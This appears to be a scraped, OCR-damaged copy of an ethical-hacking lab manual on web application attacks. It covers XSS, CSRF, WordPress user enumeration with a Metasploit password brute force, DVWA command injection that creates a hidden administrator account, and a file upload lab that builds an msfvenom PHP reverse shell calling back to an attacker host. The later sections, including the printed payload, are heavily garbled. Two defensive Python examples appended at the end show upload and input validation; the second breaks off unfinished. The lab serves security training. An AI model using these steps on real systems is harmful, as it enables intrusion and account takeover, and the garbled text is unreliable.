CEHv10 Module 14 Hacking Web Applications
Uploaded by
Андрей Скворцов
CEH Lab Manual
Hacking Web Applications
Module 14

Hacking Web Applications
Hacking web applications refers to gaining unauthorized access to a website or its associated data.

Lab Scenario
A web application is a software application running on a web browser that allows a web user to submit and retrieve data to and from a database over the Internet or an intranet. The term is also sometimes used to refer to a computer software application, coded in a browser-supported programming language (such as JavaScript, combined with a browser-rendered markup language like HTML), and reliant on a common web browser to render the application executable.

Web applications are popular because of the ubiquity of web browsers and the convenience of using them as a client. The ability to update and maintain web applications without distributing and installing software on potentially thousands of client computers is a key reason for their popularity, as is the inherent support for cross-platform compatibility. Common web applications include webmail, online retail sales, online auctions, wikis, and many others.

With the wide adoption of web applications as a cost-effective channel for communication and information exchange, they have also become a major attack vector for gaining access to organizations' information systems. Web application hacking is the exploitation of applications via HTTP, by manipulating the application logic via an application's graphical web interface, tampering with the Uniform Resource Identifier (URI), or tampering with HTTP elements not contained in the URI. Methods for hacking web applications are SQL injection attacks, cross-site scripting (XSS), cross-site request forgeries (CSRF), insecure communications, and others.

In the last module, you acted as an attacker and assessed the security of a web server platform.
Now, you will move to the next, and most important, stage of security assessment. As an expert Ethical Hacker and Pen Tester, you need to first test web applications for cross-site scripting vulnerabilities, cookie hijacking, and command injection attacks, and then secure web applications from such attacks. The labs in this module will give you hands-on experience of various web application attacks to help you audit web application security in your organization.

Lab Objectives
The objective of this lab is to provide expert knowledge of web application vulnerabilities and attacks, such as:
• Parameter tampering
• Cross-Site Scripting (XSS)
• Stored XSS
• Username and Password Enumeration
• Exploiting WordPress Plugin Vulnerabilities
• Exploiting Remote Command Execution Vulnerability
• Web Application Auditing Framework
• Website Vulnerability Scanning

Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

Lab Environment
To carry out this lab, you will need:
• A computer running Windows Server 2016
• Windows Server 2012 running as a virtual machine
• Windows 10 running as a virtual machine
• Kali Linux running as a virtual machine
• A web browser with an Internet connection

Lab Duration
Time: 100 Minutes

Overview of Web Application
Web applications provide an interface between end users and web servers through a set of web pages generated at the server end or that contain script code to be executed dynamically within the client web browser.

Lab Tasks
Recommended labs to assist you in web application are:
• Exploiting Parameter Tampering and XSS Vulnerabilities in Web Applications
• Performing Cross-Site Request Forgery (CSRF) Attack
• Enumerating and Hacking a Web Application using WPScan and Metasploit
• Exploiting Remote Command Execution Vulnerability to Compromise a Target Web Server
• Exploiting File Upload Vulnerability at Different Security Levels
• Website Vulnerability Scanning using Acunetix WVS
• Auditing Web Application Framework using Vega

Lab Analysis
Analyze and document the results related to this lab exercise. Provide your opinion of your target's security posture and exposure.
TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS

Exploiting Parameter Tampering and XSS Vulnerabilities in Web Applications
Though web applications enforce certain security policies, they are vulnerable to attacks such as SQL injection, cross-site scripting, and session hijacking.

Lab Scenario
According to OWASP, the web parameter tampering attack refers to the manipulation of parameters exchanged between client and server to modify application data, such as user credentials and permissions, the price and quantity of products, and so on. Usually, this information is stored in cookies, hidden form fields, or URL query strings, and is used to increase application functionality and control. Cross-site scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to trick the user into executing the script, so that the attacker can gather data.

Though implementing a strict application security routine, parameters, and input validation can minimize parameter tampering and XSS vulnerabilities, many websites and web applications are still vulnerable to these security threats.

Auditing web applications for parameter tampering and XSS is one of the first steps an attacker takes in attempting to compromise a web application's security. As an expert Ethical Hacker and Pen Tester, you should be aware of the different parameter tampering and XSS methods that can be employed by an attacker to hack web applications. In this lab, you will learn how to exploit parameter tampering and XSS vulnerabilities in web applications.

Lab Objectives
The objective of this lab is to help students learn how to test web applications for vulnerabilities.
In this lab, you will perform:
• Parameter tampering attacks
• Cross-site scripting (XSS or CSS)

Lab Environment
To carry out this lab, you will need:
• MovieScope website configured during the lab setup
• Windows Server 2016 running as website host machine
• Windows Server 2012 running as victim machine
• Windows 10 running as attacker machine
• Microsoft SQL Server 2017
• A web browser with an Internet connection

Lab Duration
Time: 15 Minutes

Overview of the Lab
This lab demonstrates how an attacker can easily exploit parameter tampering and XSS attacks to access protected information and perform other malicious tasks.

Lab Tasks
Web parameter tampering attacks involve the manipulation of parameters exchanged between a client and a server to modify application data such as user credentials and permissions, prices, and product quantities.

In this lab, the machine hosting the website is Windows Server 2016, so make sure the machine is running throughout the lab; the machine used to perform the cross-site scripting attack is the Windows 10 virtual machine.

1. Log in to the Windows 10 virtual machine.
2. Launch a web browser (Chrome), type http://www.moviescope.com in the address bar, and press Enter.
3. The MovieScope home/login page appears, as shown in the screenshot. Assume that you are a registered user on the website, and log in to it using the following credentials:
   Username: jon
   Password: test
4. You are logged in to the website. Click the View Profile tab at the right side of the page.
5. You will be redirected to the profile page, which displays the personal information of the user (here, you).
7. Now, try to change the parameter in the address bar, and press Enter.
8. You get the profile for sam without having to perform any hacking techniques to explore the database.
9.
Now, try another value for the id parameter in the address bar, and press Enter.
10. You get the profile for kety. This way, you can attempt to change the id number and obtain user profile information.
11. This process of changing the ID value and getting the result is known as parameter tampering. Web cross-site scripting (XSS or CSS) attacks exploit vulnerabilities in dynamically generated web pages. This enables malicious attackers to inject client-side scripts into web pages viewed by other users.
12. Now, click the Contacts tab. Here you will be performing an XSS attack.
13. The Contacts page appears; enter your name (or any random name) in the Name field, enter the cross-site script
in the Comment field, and click Submit Comment.
14. On this page, you are testing for cross-site scripting vulnerability. Now, refresh the page and click the Contacts tab again. As soon as you click the tab, a pop-up appears on the page displaying a message that You are hacked.
15. You have successfully added a malicious script in this page. The comment with malicious link is stored on the server.
16. Log in to the Windows Server 2012 virtual machine.
17. Launch a web browser (Mozilla Firefox), type the URL http://www.moviescope.com in the address bar, and press Enter.
18. The MovieScope home/login page appears. Assume that you are a registered user of the website and log in to it using the following credentials:
    Username: steve
    Password: test
19. You are logged in to the website as a legitimate user. Click the Contacts tab.
20. As soon as you click the Contacts tab, the cross-site script running on the backend server is executed, and a pop-up appears, stating, This website has been hacked.
21. Similarly, whenever a user attempts to visit the Contacts page, the alert pops up as soon as the web page is loaded.

Lab Analysis
Analyze and document the results related to this lab exercise. Provide your opinion of your target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS

Performing Cross-Site Request Forgery (CSRF) Attack
Cross-Site Request Forgery (CSRF) is an attack which forces a user to perform unknown actions on a web application in which they are currently logged in.

Lab Scenario
According to OWASP, CSRF is an attack that tricks the victim into submitting a malicious request. It inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf.
For most sites, browser requests automatically include any credentials associated with the site, such as the user's session cookie, IP address, Windows domain credentials, and so forth. Therefore, if the user is currently authenticated to the site, the site will have no way to distinguish between the forged request sent by the victim and a legitimate request sent by the victim.

CSRF attacks target functionality that causes a state change on the server, such as changing the victim's email address or password, or purchasing something. Forcing the victim to retrieve data doesn't benefit an attacker because the attacker doesn't receive the response, the victim does. As such, CSRF attacks target state-changing requests.

It's sometimes possible to store the CSRF attack on the vulnerable site itself. Such vulnerabilities are called "stored CSRF flaws". This can be accomplished by simply storing an IMG or IFRAME tag in a field that accepts HTML, or by a more complex cross-site scripting attack. If the attack can store a CSRF attack in the site, the severity of the attack is amplified. In particular, the likelihood is increased because the victim is more likely to view the page containing the attack than some random page on the Internet. The likelihood is also increased because the victim is sure to be authenticated to the site already.

Lab Objectives
The objective of this lab is to help students learn how to test web applications for vulnerabilities.
In this lab, you will perform:
• Performing CSRF attack

Lab Environment
To carry out this lab, you will need:
• Kali Linux machine as an attacker
• Windows Server 2012 as a victim

Lab Duration
Time: 10 Minutes

Overview of the Lab
CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request.
With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state-changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

Lab Tasks
1. Log in to the Windows Server 2012 virtual machine.
2. Launch a browser; in this lab we are using the Chrome browser. To launch the Chrome browser, double-click the Google Chrome shortcut icon on the desktop.
   Note: If you are using a different browser, then the screenshots will differ.
3. Type http://10.10.10.12:8080/CEH/wp-login.php? in the address bar and press Enter.
4. The CEH Demo Website page appears, as shown in the screenshot.
5. Type the following credentials and click Log in, as shown in the screenshot:
   a. Username: admin
   b. Password: qwertyo123
6. Assume that you have installed and configured a Firewall plugin for this site, and here you wanted to check the security configurations.
7. Hover your mouse cursor on Plugins and click Installed Plugins, as shown in the screenshot.
8. In the Plugins page, observe that WordPress Firewall 2 is installed. To view the configurations, click Settings, as shown in the screenshot.
9. Scroll down to the Whitelisted IPs section, and observe that the IP 10.10.10.12 is listed in the Whitelisted IPs list, which is the IP address of the Windows Server 2012 where the CEH WordPress website is hosted.
10. Leave the logged-in session running. Do not log out of the admin session of the WordPress site.
11. Log in to the Kali Linux machine with Username: root and Password: toor.
12. Assume that the attacker is performing enumeration on the CEH
WordPress website to identify the vulnerable plugins.
13. Launch a Terminal, type wpscan -u http://10.10.10.12:8080/CEH --enumerate vp, and press Enter.
14. If the Do you want to update now? prompt appears, type N and press Enter.
15. WPScan starts enumerating the vulnerable installed plugins in the CEH WordPress website.
16. This process will take approximately 6 minutes to complete the scan.
17. Once WPScan completes the scan, it lists out the vulnerable plugins present in the site, as shown in the screenshot.
18. In this lab we are going to perform a CSRF attack using WordPress Firewall.
19. Make a note of the location where the plugin is installed. Minimize or close the terminal window.
20. Open a new text document, and type the following script in the document, as shown in the screenshot.
CEHv10 Module 14 Hacking Web Applications (shared network drive).
27. Switch to the Windows Server 2012 machine, navigate to CEH-Tools > CEHv10 Module 14 Hacking Web Applications (shared network drive), copy the Security Script.html file, and paste it on the Desktop.
28. Right-click the Security Script.html file, hover your mouse cursor on Open with, and then click Google Chrome, as shown in the screenshot.
    Note: You should use the same browser that was used in step #5.
29. The Security Script.html file opens in the Chrome browser, along with a pop-up, as shown in the screenshot; click OK to continue.
31. As soon as you click the Submit button, it will redirect you to the WordPress Firewall 2 configurations page.
32. Scroll down and observe that in the Whitelisted IPs section the IP address is changed to 10.10.10.11 (Kali Linux).

Lab Analysis
Analyze and document the results related to this lab exercise. Provide your opinion of your target's security posture and exposure.

Enumerating and Hacking a Web Application using WPScan and Metasploit
WordPress is web software and a content management system (CMS) that you can use to create a website or blog.

Lab Scenario
WPScan is a black-box WordPress vulnerability scanner. It is a regular part of most of the penetration testers' assessment tools.
According to Web Technology Surveys, WordPress is used by 60.4% of all known content management system websites, and 22.8% of all websites. WPScan provides great help in assessing the security of target organizations with WordPress sites.

Lab Objectives
The objective of this lab is to help you learn how to:
• Enumerate users using WPScan
• Perform a dictionary attack to crack passwords using Metasploit

Lab Environment
To perform this lab, you will need:
• A computer running Windows Server 2016
• Windows Server 2012 running as a virtual machine
• Kali Linux running as a virtual machine

Lab Duration
Time: 10 Minutes

Overview of the Lab
This lab demonstrates multiple attacks performed on a vulnerable PHP website (WordPress) in an attempt to gain sensitive information such as usernames and passwords. You will learn how to use the WPScan tool to enumerate usernames on a WordPress website and how to crack passwords by performing a dictionary attack using an msf auxiliary module.

Lab Tasks
1. Click Start at the lower left corner of the screen, click the downward arrow, and click Wampserver64 to launch WampServer.
2. Log in to the Kali Linux virtual machine.
3. Launch a command line terminal, type the command wpscan --url http://[IP Address of Windows Server 2012]:8080/CEH --enumerate u, and press Enter.
   Note: In this lab, the IP Address of Windows Server 2012 is 10.10.10.12, which may vary in your lab environment.
4. On entering the command, you will be asked to update the database. Simply press Enter to avoid the update.
5. WPScan begins to enumerate the usernames stored in the website's database, and displays them, as shown in the screenshot.
6.
Now that you have successfully obtained the usernames stored in the database, you need to find their passwords.
7. To obtain the passwords, you will use an auxiliary module named wordpress_login_enum (in msfconsole) and perform a dictionary attack using the Passwords.txt file (in the Wordlists folder), which you copied to the root folder in the previous module.
8. To use the wordpress_login_enum auxiliary module, you need to first launch msfconsole.
9. However, you need to start the postgresql service before launching msfconsole.
10. To start the postgresql service, type the command service postgresql start and press Enter.
11. Because you have started both the services, you shall now launch msfconsole.
12. To launch msfconsole, type msfconsole and press Enter.
13. Now, you will use the wordpress_login_enum auxiliary module.
14. Type use auxiliary/scanner/http/wordpress_login_enum and press Enter.
15. This module allows you to enumerate the login credentials.
16. To know all the options you can configure in this module, type show options and press Enter.
17. You can view a list of options that can be set for this module. Because you want to obtain the password, you need to set the:
    a. PASS_FILE: In this option, you will be setting the Passwords file, using which you will be performing the dictionary attack.
    b. RHOSTS: In this option, you will be setting the target machine, i.e., Windows Server 2012 IP Address.
    c. RPORT: In this option, you will be setting the target machine port, i.e., Windows Server 2012 port.
    d. TARGETURI: In this option, you will be setting the base path to the WordPress website, i.e., http://[IP Address of Windows Server 2012]:8080/CEH.
    e. USERNAME: In this option, you will be setting the username that was obtained in Step no. 5.
18. Type set PASS_FILE /root/Wordlists/Passwords.txt and press Enter to set the file containing the passwords.
19. Type set RHOSTS [IP Address of Windows Server 2012] and press Enter to set the target IP Address.
20. Type set RPORT 8080 and press Enter to set the target port.
21. Type set TARGETURI http://[IP Address of Windows Server 2012]:8080/CEH/ and press Enter to set the base path to the WordPress website.
22. Type set USERNAME admin and press Enter to set the username as admin.
    Note: You may issue any one of the usernames that you have obtained during the enumeration process. In this lab, the admin user is being issued.
23. Now, all the options have been successfully set. Type run and press Enter to execute the auxiliary module.
24. The auxiliary module begins to brute force the login credentials by trying various passwords for the given username admin.
25. Once the correct password associated with the username is found, the module stops and displays the cracked password, as shown in the screenshot.
26. Now, use the obtained username-password combination to log in to the WordPress website.
27. Launch the Firefox ESR web browser, type http://[IP Address of Windows Server 2012]:8080/CEH/wp-login.php in the address bar, and click Log in.
28. You should be able to successfully log in to the website, as shown in the screenshot.
29. In the same way, you can follow steps 18-22 and crack other users' passwords (by setting another username obtained during enumeration; e.g., "cehuser1").
30. Thus, you have successfully enumerated the usernames and cracked their passwords.

Lab Analysis
Analyze and document the results related to this lab exercise. Provide your opinion of your target's security posture and exposure.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS

Exploiting Remote Command Execution Vulnerability to Compromise a Target Web Server
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is extremely vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications, and aid teachers/students in teaching/learning web application security in a classroom environment.

Lab Scenario
Web developers build web applications, keeping in mind all the security measures involved in doing so. Any loopholes found in the applications might allow attackers to exploit them, resulting in remote code execution, database extraction, and sometimes even the complete takeover of the servers that host them. Thus, as a CEH, you need to ensure that web applications are properly built and are free from vulnerabilities that could lead to SQL injection, cross-site scripting, and so on.

Lab Objectives
The objective of this lab is to help you learn how to exploit command-line execution vulnerabilities.

Lab Environment
To perform this lab, you will need:
• A computer running Windows Server 2016
• Windows Server 2012 running as a virtual machine
• Windows 10 running as a virtual machine
• Web browsers

Lab Duration
Time: 20 Minutes

Overview of the Lab
This lab demonstrates the exploitation performed on a command-line execution vulnerability found in DVWA. Here, you will learn how to extract information of a target machine, create a user account, assign administrative privileges to the created account, and use that account to log in to the target machine.

Lab Tasks
1. Click Start at the lower left of the screen, click the downward arrow, then click Wampserver64 to launch WampServer.
2.
Launch the Windows 10 virtual machine from VMware Workstation, and log on to it.
3. Launch any browser (here, Chrome), type the URL http://[IP Address of Windows Server 2012]:8080/dvwa in the address bar, and press Enter.
   Note: The IP address of Windows Server 2012 in this lab is 10.10.10.12, which might vary in your lab environment.
4. The DVWA login page appears; type the following credentials, then click Login:
   a. Username: gordonb
   b. Password: abc123
5. gordonb's page appears; click Command Execution.
6. The command execution utility in DVWA allows you to ping a machine.
7. Type the IP Address of the Windows Server 2012 machine, and click Submit to ping the machine.
8. DVWA has successfully pinged a machine, as shown in the screenshot.
9. Now try issuing a different command to check whether DVWA can
10. Issue the command | hostname and click Submit. Generally, hostname is used to probe the name of the target machine.
11. Because you have issued a command instead of entering an IP address of a machine, the application returns an error, as shown in the screenshot.
12. This shows that the application is secure enough.
13. Now check the security setting of the web application. Click DVWA Security in the left pane.
14. The DVWA Security web page appears. Observe that the security level is Impossible. This security setting was blocking you from executing commands other than simply pinging a machine.
15. Now, set the security level of the web application to "low" to exploit the command execution vulnerability. Here, your intention would be to show that a weakly secured web application is the prime focus of attackers, to exploit its vulnerabilities.
16. Select the low option from the drop-down list, and click Submit.
17. You have configured a weak security setting in DVWA. Now check if you can execute any commands besides pinging a machine.
18. Click Command Injection in the left pane.
19. The Command Injection web page appears; type | hostname and click Submit.
20. DVWA returns the name of the Windows Server 2012 machine, as shown in the screenshot.
21. This infers that the command execution field is vulnerable, and you are able to execute commands remotely.
22. Now, try to extract more information regarding the Windows Server 2012 machine.
23. Type the command | whoami and click Submit.
24. The application displays the user, group, and privileges information for the user currently logged on to the Server 2012 machine, as shown in the screenshot.
25. Now, view the processes running on the machine. Type | tasklist and click Submit.
26. A list of all the running processes is displayed, as in the screenshot.
27. Check if you can terminate a process. Choose a process (other than a Windows process; here, firefox is chosen), and note its process ID (PID).
28. Type | taskkill /PID [Process ID value of the desired process] /F and click Submit.
29. By issuing this command, you are forcefully (/F) terminating the process.
30. The process will be successfully terminated, as shown in the screenshot.
31. To confirm that the process has been successfully terminated, issue the | tasklist command.
32. Now, view the directory structure of the Windows Server 2012 machine.
33. Type | dir C:\ and click Submit to view the files and directories in C:\.
34. The directory structure of Windows Server 2012 is displayed, as in the screenshot.
35. In the same way, you can issue commands to view other directories.
36. Now try to obtain information related to the user accounts.
37. To view user account information, type | net user and click Submit.
38. DVWA obtains user account information from Windows Server 2012 and lists it, as shown in the screenshot.
39.
Now, use the command execution vulnerability and attempt to add a user account remotely.
40. Here, you will create an account named Test. Type | net user Test /Add and click Submit.
41. A user account is created with the name "Test." View the new user account by issuing the command | net user.
42. You will observe the newly created account, as shown in the following screenshot.
43. Now, view the new account's information. Type | net user Test and click Submit.
44. The Test account information appears. You can see that Test is a standard user account and does not have administrative privileges.
45. Now assign administrative privileges to the account. The reason for granting administrative privileges to this account is to use this (admin) account to log in to the Windows Server 2012 machine by a remote desktop connection and with administrator access.
46. To grant administrative privileges, type | net localgroup Administrators Test /Add and click Submit.
47. Now you have successfully granted admin privileges to the account. Confirm the new setting by issuing the command | net user Test.
48. Observe that Test is now an administrator account.
49. So, now log in to the Windows Server 2012 machine's Test account, using Remote Desktop Connection.
50. Display the Start menu, and click Windows Accessories > Remote Desktop Connection.
51. The Remote Desktop Connection dialog box appears; enter the IP Address of the Windows Server 2012 (here, 10.10.10.12) machine in the Computer text field and click Connect.
WB Remote Destep Connection - Remote Desktop Connection compte: (foro7074 Username: None spected Youve be shed orcedete whe you comet. ©) Stow OptoneEnter your credentials ‘These credentials willbe used to connect to 10.10.10.12. 53, The Remote Desktop Comection window appears; dick Yes to connect ‘o the emote computer. 7H Fete Detop Connecbon Theron cores causretbe amertcated to blr (Sovtyodeae thay ade poses. Geto ane [Gi Name nine cate fone ent compaer ‘WHOWAONPACEHoo cettone on —, dens A, Tecatfeatennatton ated cating sty Doyeu wont cme ages cee oon? (Cte ak pantrcrrctrstotha meter od [=] "IG 4 etait Des Cann ‘Gea Nana Pe ‘ia angi Cees Cp Oy HE “Hip teaweet penton seoModule 14- aching Web Aplatons 54, A remote desktop connection is successfully established, as shown in the screenshot Ba Server Manager Thus, you have made use of a command execution vulnerbiliy in a DYWA application hosted on a Windows Server 2012 machine, extracted infomation related to the machine, created an administrator account remotely, and logged ito it. 56, Now, you may discontinve the session and log out ofthe web application. PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS Pati) Dyes No Platform Supported, Fi Classroom Bitabs ‘CN Tab Waal P "eal eyed Gnas Cah Em> vautie PF tensor oll BA wérexnise D wonton view © roots ‘his nb are ‘mvailable in ace. ‘TookceHvI0 Module 14 Hacking Web ‘Applications, Motte 14 Machng Wes Appeatone Exploiting File Upload Vulnerability at Different Security Levels Dane Vabedble Web App (DVWA) ia PHP/MSSQL. 
wd appiaion that ‘is damm vulnerable, Lab Scenario ‘Web developers bid web applications, keepingin mind that all he security measures {volved in doing 20, Any loopholes found inthe applications might allow atacers to exploit them, resking in remoce nde exertion, database extsction, and sometimes even the compte takenvcr of the servers that hort them, As an expert Penetration ‘Tester, ju need to determine whether your website ie secure before hnackers download sensitive dat, commit acme using your website as lane pad, and endanger your business. Ths, as Certified Ethical Hacker (CEH), you need © ‘ensure that wes applications ae propedly built and are fre frem vulnerabilities that ould lead to SQI- injection, cose «ripting and s0 on. Concise reports entity ‘where web appiations need tobe fixed, thus enabling you to protect your busness From impending hacker attacks! Lab Objectives “The objective ofthis ab eto dp you undentand ane demons Fe pond ‘vulnerability ina web app. Lab Environment “oper this hb, ou wil nea A computer running Windows Server 2016 Kal Linux runing a virtual machine + Windows Server 2012 runing a vial machine © web bramer wih an Item connection "ial Maing Gace Ch Hm Mis Rowee pectone Sec attestFromvoror Molo 14 Mocking We Appatons Lab Duration “ime: 2 Mines Overview of Web Application Security ‘Web apition wet i mmc ofinfoemation sci tsp dels wih the acy of weit web apllesios el web i. Atahigh evel, Web application security drawson the principles of aplication secity ‘butapplies them spaccaly wo Teteret andl Web systems Typically, web apiicasons are developed using programming languyges such as PHP, Java EE, Java, Pthoo, Ruby, ASPNET, CH, VNET, or Cassie ASP, Lab Tasks Before starting this lab, male sure that Windows Server 2012 virtual machine is ‘turned on and WAMPServer is rncing 1, Launch Windows Server 2012 from VMware Workstation snd log isto the machine. 2 Once you have logged into the machine, navigate o Start and click Wampservers4. 
3, This wil start che WAMPServor service on the Windows Server 2012 machin. 4, Leave the Windows Server 2012 nioing.Module 14- Hocking Woe Apieatone 5. Now, lauoch the Kall Linux vrtal machine fom VMware Workstation and log into the machine, “GallLab Maal Paste iia adnan Gansu Ce lyMot 14- Hacking Wins Apocatons 6 Open up 2 terminal window, ype mafvenom pphpimeterpreterreverse tep Ihout=10.10.40.11 inort=44ea raw anc) hit Enter. 7. The aw payload is generate in the terminal window. Slee the payload sand copy it by right clicking on it then choosing Capy option from the context menu, as shown in the sereenshor 8. Now open Leatpad snd paste the rw payload code, as shown in the screenshot. ial gd Geen oy Rtote 14: Hachng Wi Apo tions 9, Click Fite menu in the Menu bar and choose Sawe A. fom the mem. co) Tein 90{0); $39 = "10-18.20.21"; Sport = aude: a4 (St 00 Sereme | Fart ek iSEavtabe(ae)) (2 > SHAR TMET, Stick STREAM, batccaect| sa. Suny spore) fH (tSren) (seal ‘mmexen sence Utt'es type) ale( ao soenet tunes"): bP ¢ sb socket regtsiy Sten: strien 5 S6LOnAST negeeck| = f1y detoans( mepseck S90") = sade supose") ce int et fedisable evel’ T) { ssatosan bjpassnereate tunctioa ‘Ssunosin oypsss(bs } else C eett@o)e } Get LS eo 10, When Save As. vindow appears, give the payload fle a name (here ‘upload.php) and choose the location as Desktop, Then click Save and close all the windows that were open. ae Seite) PURE See CCE Tab Maru Pacts Cen Hacking Gooremear aren Conih ©y EO ame “Eerie yeeros Se oeMode 14: Macking Wich Appeatins Al, Launch Firefox ESR browser and enter the URL as ‘ntps710.40.10.12:0080idvwallogin.php. The login page eppears, enter the user credentials 2s adminjpassword and click Login. 
GLA STEW 12, Click DWA Security ia the left pane to view the DVWA seeusty level, Set the security level by scleting Law from the drop dow list and clic ‘the Submit button, as shown inthe sreenshot: “GilitarNima gli ing cmc Ca ‘itgis noel Resco etyduo 14- Mocking Vite Arplstons 13, Select File Upload option from the left pane and click Browse. bution to vpload filet show in the screenshot: Ta RN BW a NT TT SPR RTS vey Fa wesnoe en Plt Soty tale Nas Wat wi 8 Wig aor = MES a in 14, Fle Upload window appears, selec the payioad file (here upload.php) and dick Open. Fi Upload 4 @root [mBESMEp » Alles = ‘GIL Med ‘iti ing snd Gemems Caps©yEme Titers enor cy PoeMode 14 Machng We Appeatons 15, You can see the ile has been selected for uploal. Now lick the Upload button to uplond the file tothe database, as shown in the sereenshot: FE FS GT. BST STE IN TT TITAS Bima age feo minions setee oversee slomnie ret etnn Nets Nea fi Raton Bem = | = “More Information WES C—O 16. You will sce a message that the file has been uplonded successful, with the location of the fle, Note the lneston of the file and minimize the brouser window. a a a favetie ren UE Pps vets Moin ert Nein ans iat Ob Aton mo = Vulnerability: File Upload Sa Mor information CORES Mea SE ad Taina adig ed Coamo Oa Tita red Repent sy tsMoti 14. Mackng Wo Appetins 17, Launch 2 Terminal wiadow and type mefeonsole, Hit Entor to un the Metasploit Framework. 18. Now youhave to set up listener so that you can establish a meterpreter ‘session with your victim, Follow the steps listed below to setup alistener ‘sing dhe msf eommand line A. Type use multimandier and hit Enter. |B. ‘Type sot payload phpimetorproterroverse top and hit Enter. G. Type sot meet 10.10.10.11 and hit Entor. D. 
Typeset iport aaa and hit Enter E, Now to sar the lsener ype mum and hit EnterMoai 14 Hacong We Aspens 19, Now dace listener is up and running, open up the Frofox browser and i a new tub, ype the location of the uploaded fle (hore httpr40.10.10.12:8080!drwahackabloluploadsiupload.php) inthe adress bar and press Entor to exccut the uploaded payload. A ————s 7-9] Cn sesee | aerate yep eee BCLS Opn yal ein tame 20, When you switch buck 10 the terminal window, you will sce that a rmeterpreter session has been exuablshed with the viet system, as shown the screenshot guar ooo] 21, In the meterpreter command line, type aysinf and hit Enter 0 view the system details ofthe vc. Close all windows to exit TR Too] 22, Open 2 now Terminal window, type _mufvenom Phpimotorprotorrovorso tep Ihost=10.10.10-11 Iport=3333 4 raw ard hit tor, 0 generate the x payload Cs a ‘Ca aa ge Ti Tag acne nil SyCoH a Mand Mott 6 Hachng Vib Aptetons 2A, Selet the raw payload, sight dick and eopy tas shown inthe screenshot FOURESIS Gp mea 24, Open Leatpad from the taskbar and paste the paplond copied in the previous Sse aeaina a« Seay om Sic en tate hel Gd, ee tae aemaeeei aera a oa seeped ti 25, Clk File Save A. frm the men bat, 0} he is entiabecsti { $8.0 81 (ten /4si0) Sete he tan 8 at 2 ttc susten (Sty {cate strum lon «trea ae dnchypue(h} atea (ati ‘i tingid Cnememns Cappy HEE Mir noonat upeactont anc ae
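At the Low security level used in steps 12 to 19, DVWA accepted upload.php and served it from a web-accessible directory, so the server ran it. The following is an added example (not part of the lab manual or of DVWA) of the server-side checks that stop this; ALLOWED, MAX_BYTES, check_upload, store, verdict and the sample bytes are assumptions made for the illustration.

```python
import os
import secrets

# Allowed extensions mapped to the magic bytes a genuine file starts with.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
MAX_BYTES = 100_000  # assumed size limit for this example


def check_upload(filename: str, data: bytes) -> str:
    """Return a server-chosen file name, or raise ValueError."""
    # Keep only the last path component of the client-supplied name.
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        raise ValueError("extension not allowed")
    if len(data) > MAX_BYTES:
        raise ValueError("file too large")
    if not data.startswith(ALLOWED[ext]):
        raise ValueError("content does not match extension")
    # Never reuse the client's name: a random name removes double
    # extensions (x.php.png) and path tricks from the stored file.
    return secrets.token_hex(16) + ext


def store(upload_dir: str, filename: str, data: bytes) -> str:
    """Write a validated upload into upload_dir and return its path.

    upload_dir should sit outside the web root (or have script execution
    disabled), so a file that passes the checks is only served as bytes.
    """
    path = os.path.join(upload_dir, check_upload(filename, data))
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as handle:
        handle.write(data)
    return path


def verdict(filename: str, data: bytes) -> str:
    """Describe the decision for one upload as a short string."""
    try:
        check_upload(filename, data)
        return "accept"
    except ValueError as exc:
        return "reject: " + str(exc)


# Constructed sample inputs (harmless placeholders, not real payloads).
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_SAMPLE = b"<?php /* constructed placeholder */ ?>"

if __name__ == "__main__":
    for name, body in [("upload.php", PHP_SAMPLE),
                       ("upload.php.png", PHP_SAMPLE),
                       ("photo.png", PNG_SAMPLE)]:
        print(name, "->", verdict(name, body))
```

Magic-byte checks alone do not prove a file is inert, which is why the storage location and the server-chosen name matter as much as the validation.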
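The command injection lab earlier in this section (steps 25 to 55) works because the "Ping a device" input reaches a command shell unvalidated. This added example, which is not from the lab manual or from DVWA, contrasts string concatenation with a handler that accepts only an IP address and passes it to ping as a single argument; the function names and the SAMPLES list are constructed for illustration.

```python
import ipaddress
import subprocess


def shell_string_unvalidated(target: str) -> str:
    """The flawed pattern: the text a concatenating handler gives the shell.

    Anything after a pipe in `target` becomes a second command.
    (This function only builds the string; it executes nothing.)
    """
    return "ping " + target


def parse_target(target: str) -> str:
    """Return the canonical IP address, or raise ValueError for anything else."""
    return str(ipaddress.ip_address(target.strip()))


def build_ping_argv(target: str) -> list:
    """Build an argument vector for Windows ping (-n is the echo count).

    Each list element is exactly one argument and no shell parses it,
    so metacharacters such as | have no special meaning.
    """
    return ["ping", "-n", "4", parse_target(target)]


def ping(target: str) -> str:
    """Run ping without a shell and return its output."""
    result = subprocess.run(build_ping_argv(target), shell=False,
                            capture_output=True, text=True, timeout=30)
    return result.stdout


def review(inputs):
    """Return (input, accepted) pairs as the hardened handler would decide."""
    decisions = []
    for value in inputs:
        try:
            build_ping_argv(value)
            decisions.append((value, True))
        except ValueError:
            decisions.append((value, False))
    return decisions


# Constructed sample: one legitimate address, then the strings the lab
# types into the "Ping a device" field.
SAMPLES = [
    "10.10.10.12",
    "| tasklist",
    "| net user",
    "| net user Test /Add",
    "| net localgroup Administrators Test /Add",
]

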